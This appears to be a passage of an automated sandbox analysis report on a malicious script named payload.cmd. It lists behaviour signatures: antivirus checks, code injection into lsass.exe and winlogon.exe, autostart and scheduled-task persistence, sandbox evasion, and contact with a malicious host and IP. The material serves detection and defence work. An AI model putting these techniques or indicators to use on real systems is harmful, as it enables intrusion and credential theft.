Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-9pdB1aHK VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-9pdB1aHK VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 41_2_0000000140002300
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 20_2_000002527DEE8090
AV process strings found (often used to terminate AV products)
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.53.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524983 Sample: payload.cmd Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 81 azure-winsecure.com 2->81 83 ipwho.is 2->83 95 Suricata IDS alerts for network traffic 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 .NET source code references suspicious native API functions 2->99 101 14 other signatures 2->101 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 131 Suspicious powershell command line found 13->131 133 Suspicious command line found 13->133 18 powershell.exe 33 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 135 Writes to foreign memory regions 16->135 137 Modifies the context of a thread in another process (thread injection) 16->137 139 Injects a PE file into a foreign processes 16->139 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 79 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 18->79 dropped 103 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->103 105 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->105 107 Uses schtasks.exe or at.exe to add and modify task schedules 18->107 115 4 other signatures 18->115 32 cmd.exe 1 18->32         started        35 WerFault.exe 20 16 18->35         started        109 Injects code into the Windows Explorer (explorer.exe) 26->109 111 Contains functionality to inject code into remote processes 26->111 113 Writes to foreign memory regions 26->113 117 3 other signatures 26->117 37 lsass.exe 26->37 injected 39 winlogon.exe 26->39 injected 41 svchost.exe 26->41 injected 43 16 other processes 26->43 signatures8 process9 signatures10 89 Suspicious powershell command line found 32->89 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        91 Writes to foreign memory regions 37->91 process11 process12 51 cmd.exe 1 45->51         started        signatures13 119 Suspicious powershell command line found 51->119 121 Suspicious command line found 51->121 54 powershell.exe 51->54         started        58 WMIC.exe 1 51->58         started        60 WMIC.exe 1 51->60         started        62 4 other processes 51->62 process14 dnsIp15 85 azure-winsecure.com 154.216.20.132, 49719, 6969 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 54->85 87 ipwho.is 195.201.57.90, 443, 49720 HETZNER-ASDE Germany 54->87 123 Creates autostart registry keys with suspicious values (likely registry only malware) 54->123 125 Creates autostart registry keys with suspicious names 54->125 127 Creates an autostart registry key pointing to binary in C:\Windows 54->127 129 6 other signatures 54->129 64 powershell.exe 54->64         started        67 schtasks.exe 54->67         started        69 WerFault.exe 54->69         started        71 WerFault.exe 54->71         started        signatures16 process17 signatures18 93 Injects a PE file into a foreign processes 64->93 73 conhost.exe 64->73         started        75 powershell.exe 64->75         started        77 conhost.exe 67->77         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
154.216.20.132
 azure-winsecure.com Seychelles
135357 SKHT-ASShenzhenKatherineHengTechnologyInformationCo true
195.201.57.90
 ipwho.is Germany
24940 HETZNER-ASDE false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
ipwho.is 195.201.57.90 true
azure-winsecure.com 154.216.20.132 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipwho.is/ false
    		unknown